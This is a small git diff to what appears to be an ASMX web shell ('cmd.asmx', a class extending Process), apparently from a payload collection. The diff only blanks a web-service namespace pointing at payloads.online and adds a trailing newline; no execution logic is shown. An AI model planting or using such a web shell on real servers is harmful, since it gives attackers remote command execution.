diff --git a/aspx/cmd.asmx b/aspx/cmd.asmx index d97ef0c..9caf260 100644 --- a/aspx/cmd.asmx +++ b/aspx/cmd.asmx @@ -31,7 +31,7 @@ using System.Web.Services; using System.Xml; using System.Web.Services.Protocols; -[WebService(Namespace = "http://www.payloads.online/")] +[WebService(Namespace = "")] [WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] public class New_Process :Process @@ -81,4 +81,4 @@ public class Service : System.Web.Services.WebService HttpContext.Current.Response.End(); return R; } -} \ No newline at end of file +}